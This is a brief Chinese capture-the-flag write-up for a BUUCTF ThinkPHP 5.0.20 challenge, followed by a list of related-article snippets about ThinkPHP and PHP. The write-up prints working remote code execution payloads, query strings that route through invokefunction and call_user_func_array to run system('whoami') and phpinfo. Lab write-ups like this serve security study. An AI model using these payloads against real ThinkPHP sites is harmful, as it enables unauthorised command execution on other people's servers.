buuctf [ThinkPHP]5

大佬们都是直接rce

这里漏洞技术细节(涉及代码段、原理等)我上个链接
https://blog.csdn.net/ArrowQin/article/details/105913146
https://bbs.ichunqiu.com/thread-48687-1-1.html?tdsourcetag=s_pcqq_aiomsg
https://blog.csdn.net/shuaicenglou3032/article/details/109002651

解题

版本是ThinkPHP V5.0.20

poc
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

在phpinfo发现flag
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

(0)

相关推荐

  • 关于php的ini文件相关操作函数浅析

    关于php的ini文件相关操作函数浅析 在小公司,特别是创业型公司,整个服务器的搭建一般也是我们 PHP 开发工程师的职责之一.其中,最主要的一项就是要配置好服务器的 php.ini 文件.一些参数会 ...

  • 一次艰难的TP渗透测试

    信息收集 由于网站 www.a.com/admin,访问立即跳转到www.a.com/admin/publicer/login 发现是TP,5.0.23,在漏洞的版本范围内,尝试使用: index.p ...

  • 路由定义

    启用路由 要使用路由功能,前提是你的URL支持PATH_INFO(或者兼容URL模式也可以,采用普通URL模式的情况下不支持路由功能),并且在应用(或者模块)配置文件中开启路由: // 开启路由'UR ...

  • scanpy教程:空间转录组数据分析

    男, 一个长大了才会遇到的帅哥, 稳健,潇洒,大方,靠谱. 一段生信缘,一棵技能树. 生信技能树核心成员,单细胞天地特约撰稿人,简书创作者,单细胞数据科学家. 我们知道没有一个细胞是孤立的,而细胞之间 ...

  • 完美避开php内核的各种问题

    今天你学废了吗 介绍 php中的disable_function是EG(ini_directives)来获得的,而phpinfo根据 EG(ini_directives) 中获取信息并打印. 然后通过 ...

  • 系统发生错误

    #0 /wwwroot/2019.xinxuejy/ThinkPHP/Library/Think/App.class.php(101): E('\xE6\x97\xA0\xE6\xB3\x95\xE5 ...

  • 从本地到WordPress代码注入

    什么是create_function? 版本影响: 注意:create_function在PHP7.2.0之后被废弃,因此该函数的适用范围在PHP 4 >= 4.0.1.PHP 5. PHP 7 ...

  • Thinkphp 表单验证规则

    'number'      => ':attribute必须是数字', 'integer'     => ':attribute必须是整数', 'float'       => ': ...

  • thinkphp框架开发 微商新零售v2.0.8 闯关派单工具

    thinkphp框架开发 微商新零售v2.0.8 闯关派单工具 评分规则 可封装成APP thinkphp框架开发 微商新零售v2.0.8 闯关派单工具 评分规则 hinkphp框架开发 微商新零售v ...

  • Thinkphp 框架配置操作之配置加载与读取配置实例分析

    这篇文章主要介绍了Thinkphp 框架配置操作之配置加载与读取配置,结合实例形式分析了Thinkphp 框架配置操作中配置加载原理.操作技巧与相关注意事项,需要的朋友可以参考下本文实例讲述了Thin ...

  • thinkPHP定义路由

    URL地址里面的index模块怎么才能省略呢,默认的URL地址显得有点长,下面就来说说如何通过路由简化URL访问. 我们在路由定义文件(application/route.php)里面添加一些路由规则 ...

  • TP5(ThinkPHP)查看具体的版本号

    TP5查看程序的具体版本号有三种方法: 在控制器中查看版本号 保存文件,在浏览器查看打印结果 在模板中查看版本号,第一步,渲染模板 第二步,编写模板 在浏览器查看模板中返回的版本号 在文件中,查看TP ...

  • thinkphp模板中volist输出数组的键名

    php中输出数组的键名 $arr = array('key1'=>1,'key2'=>2); foreach($arr as $key=>$val) { echo $key; } t ...

  • thinkphp常见路径用法分析

    本文实例分析了thinkphp常见路径用法.分享给大家供大家参考.具体如下: 这里介绍的标签主要有: __root__ __self__ __action__ __url__ __app__ __pu ...

  • ThinkPHP 自动验证与自动填充无效可能的原因

    自动验证与自动填充是在使用ThinkPHP时经常用到的功能,但偶尔会遇到自动验证与自动填充无效的情况,本文就ThinkPHP 自动验证与自动填充无效可能的原因做一些分析. create() Think ...

  • 编程语言关于thinkphp邮箱验证码前后台

    编程语言关于thinkphp邮箱验证码前后台 言关于thinkphp邮箱验证码前后台 以上就是关于thinkphp邮箱验证码前后台的详细内容,更多请关注php中文网其它相关文章! 文章来源:https ...